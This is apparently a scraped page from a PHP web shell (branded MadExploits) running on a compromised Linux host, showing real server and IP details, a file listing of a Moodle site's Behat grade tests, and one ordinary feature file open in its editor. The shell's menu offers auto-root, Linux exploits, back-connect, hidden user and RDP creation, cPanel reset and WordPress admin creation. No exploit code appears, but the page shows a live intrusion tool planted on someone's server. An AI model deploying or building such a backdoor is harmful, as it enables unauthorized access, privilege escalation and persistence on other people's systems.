Linux aries.aptans.com 4.18.0-348.20.1.lve.1.el8.x86_64 #1 SMP Wed Mar 16 08:45:39 EDT 2022 x86_64
Apache
: 135.181.142.107 | : 172.70.179.154
Cant Read [ /etc/named.conf ]
7.4.33
aja
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
aja /
public_html /
ead /
grade /
tests /
behat /
[ HOME SHELL ]
Name
Size
Permission
Action
behat_grade.php
15.78
KB
-rw-r--r--
grade_UI_settings.feature
2.35
KB
-rw-r--r--
grade_aggregation.feature
30.95
KB
-rw-r--r--
grade_aggregation_changes.feat...
19.76
KB
-rw-r--r--
grade_average.feature
2.88
KB
-rw-r--r--
grade_calculated_grade_items.f...
10.71
KB
-rw-r--r--
grade_calculated_grade_items_2...
10.8
KB
-rw-r--r--
grade_calculated_weights.featu...
13.81
KB
-rw-r--r--
grade_category_validation.feat...
6.47
KB
-rw-r--r--
grade_contribution_with_extra_...
3.98
KB
-rw-r--r--
grade_grade_minmax_change.feat...
3.81
KB
-rw-r--r--
grade_hidden_items.feature
4.75
KB
-rw-r--r--
grade_hidden_items_locked_cate...
4.34
KB
-rw-r--r--
grade_item_duplication.feature
2.21
KB
-rw-r--r--
grade_item_form_unhide.feature
6.19
KB
-rw-r--r--
grade_item_validation.feature
5.02
KB
-rw-r--r--
grade_letter_boundary.feature
1.85
KB
-rw-r--r--
grade_letter_boundary_20160518...
1.96
KB
-rw-r--r--
grade_letter_logging.feature
1.46
KB
-rw-r--r--
grade_mingrade.feature
6.23
KB
-rw-r--r--
grade_minmax.feature
11.22
KB
-rw-r--r--
grade_natural_exclude_empty.fe...
20.13
KB
-rw-r--r--
grade_natural_exclude_empty_20...
21.03
KB
-rw-r--r--
grade_natural_normalisation.fe...
14.54
KB
-rw-r--r--
grade_natural_normalisation_20...
7.12
KB
-rw-r--r--
grade_override_letter.feature
9.56
KB
-rw-r--r--
grade_point_maximum.feature
4.7
KB
-rw-r--r--
grade_regrade_do_not_override....
3.7
KB
-rw-r--r--
grade_scales.feature
10.73
KB
-rw-r--r--
grade_scales_aggregation.featu...
6.99
KB
-rw-r--r--
grade_scales_logging.feature
959
B
-rw-r--r--
grade_single_item_scales.featu...
8.22
KB
-rw-r--r--
grade_to_pass.feature
14.22
KB
-rw-r--r--
grade_view.feature
5.15
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : grade_point_maximum.feature
@core @core_grades Feature: We can change the grading type and maximum grade point values In order to verify that we can change the system-level maximum grade point value As an admin I need to modify the system maximum grade point and ensure that activities can use the full range. I need to ensure that using scales for activities still works correctly. I need to ensure that the maximum grade point value is enforced for new and existing activities. Background: Given the following "courses" exist: | fullname | shortname | category | format | | Course 1 | C1 | 0 | topics | Given the following "activities" exist: | activity | course | idnumber | name | intro | | assign | C1 | assign1 | Test Assignment 1 | Test Assignment 1 | And I log in as "admin" And I navigate to "Grades > General settings" in site administration And I set the following fields to these values: | Grade point maximum | 900 | | Grade point default | 800 | And I press "Save changes" And I am on "Course 1" course homepage @javascript Scenario: Validate that switching the type of grading used correctly disables input form elements Given I am on the "Test Assignment 1" "assign activity editing" page When I expand all fieldsets And I set the field "grade[modgrade_type]" to "Point" Then the "Scale" "select" should be disabled And the "Maximum grade" "field" should be enabled And I set the field "grade[modgrade_type]" to "Scale" And the "Maximum grade" "field" should be disabled Then the "Scale" "select" should be enabled And I set the field "grade[modgrade_type]" to "None" Then the "Scale" "select" should be disabled And the "Maximum grade" "field" should be disabled And I press "Save and return to course" @javascript Scenario: Create an activity with a maximum grade point value less than the system maximum Given I am on the "Test Assignment 1" "assign activity editing" page When I expand all fieldsets And I set the field "grade[modgrade_type]" to "point" And I set the field "grade[modgrade_point]" to "600" And I press "Save and display" And I am on the "Test Assignment 1" "assign activity editing" page Then the field "grade[modgrade_point]" matches value "600" And the "Scale" "select" should be disabled And I press "Save and return to course" @javascript Scenario: Create an activity with a scale as the grade type Given I am on the "Test Assignment 1" "assign activity editing" page When I expand all fieldsets And I set the field "grade[modgrade_type]" to "Scale" And I set the field "grade[modgrade_scale]" to "Separate and Connected ways of knowing" And I press "Save and display" And I am on the "Test Assignment 1" "assign activity editing" page Then the field "grade[modgrade_scale]" matches value "Separate and Connected ways of knowing" And the "Maximum grade" "field" should be disabled And I press "Save and return to course" @javascript Scenario: Create an activity with no grade as the grade type Given I am on the "Test Assignment 1" "assign activity editing" page When I expand all fieldsets And I set the field "grade[modgrade_type]" to "None" And I press "Save and display" And I am on the "Test Assignment 1" "assign activity editing" page And the "Scale" "select" should be disabled And the "Maximum grade" "field" should be disabled And I press "Save and return to course" Scenario: Create an activity with a maximum grade point value higher than the system maximum Given I am on the "Test Assignment 1" "assign activity editing" page When I expand all fieldsets And I set the field "grade[modgrade_type]" to "Point" And I set the field "grade[modgrade_point]" to "20000" And I press "Save and display" Then I should see "Invalid grade value. This must be an integer between 1 and 900" And I press "Cancel" Scenario: Create an activity with a valid maximum grade point and then change the system maximum to be lower Given I am on the "Test Assignment 1" "assign activity editing" page When I expand all fieldsets And I set the field "grade[modgrade_type]" to "point" And I set the field "grade[modgrade_point]" to "600" And I press "Save and display" And I navigate to "Grades > General settings" in site administration And I set the following fields to these values: | Grade point maximum | 100 | And I press "Save changes" And I am on the "Test Assignment 1" "assign activity editing" page And I press "Save and display" Then I should see "Invalid grade value. This must be an integer between 1 and 100" And I press "Cancel"
Close